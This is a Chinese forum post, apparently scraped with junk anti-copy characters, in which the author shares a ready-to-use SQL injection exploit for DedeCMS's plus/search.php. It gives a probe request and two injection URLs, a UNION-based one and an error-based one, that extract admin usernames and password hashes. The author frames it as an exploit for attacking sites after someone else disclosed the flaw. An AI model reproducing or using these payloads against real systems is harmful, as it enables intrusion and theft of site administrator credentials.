转载不加作者名的没JJ- s4 G; ]3 i1 S# m
8 |) X% O4 \- [
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
+ a) v9 B& _% Y" ]
0 o- \$ b7 j' M% M F4 P既然已经发出来了,我就把我自己搞的exp发下吧。。唉。& p- G2 G: D K3 V! T) U
' u7 ?5 e8 h9 Z7 Y我一般是这样测试的:- G, v/ }6 b( x; \& n; K2 g: {
: t$ A. l2 s$ V8 F, M4 ~2 a, y& ~! O
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a# g8 o* a2 f1 `
" R+ E& o m- ?: U4 Q8 [
转载不加作者名的没JJ
9 J$ o0 Z0 X! J" a8 a
, Y- S, y% I! D, B! J+ S" O作者:鬼哥
, X2 w$ K' H8 ~+ ]: f+ `# N( g- `; t# @
, @2 l J9 p% v1 @# U+ V* ?) P
3 |6 P9 k+ B! N& N; ^5 Z, D+ c看结果如果提示
; e9 c3 b! k# y# _6 p8 N: b8 [7 S4 @) ]5 u! i ?
Safe Alert: Request Error step 2 !
4 _7 O2 _4 q" M8 E
" n8 [! [! x- `# n+ n那么直接用下面的exp
+ |" L! {# w+ H8 w, H$ {. ]$ x% S
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a" p$ l9 J- s- _$ _
: b0 L4 E. V3 o5 O2 H* H$ B
$ P3 F7 S" J A$ _& J$ Z( R看结果如果提示
" E* O+ Z# K/ I8 {4 [, o7 a: w2 @- d8 z* C9 I
Safe Alert: Request Error step 1 !
2 N" Z2 T d7 ]
q) d/ b% B. H那么直接用下面的exp
$ `8 C) X# K& Y% J% j, s- j! u2 i4 I6 X5 U0 N) [
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
4 B/ j6 L$ t5 R0 ]1 v
: I+ R' j+ s1 Q9 ^
( ?# }! {! V7 m% c+ F如果正常显示证明漏洞不存在了。% I7 \- w2 k- Z% r1 k( S- x8 B
0 _2 P8 Q" m; }1 b8 Q/ u! e
转载不加作者名的没JJ |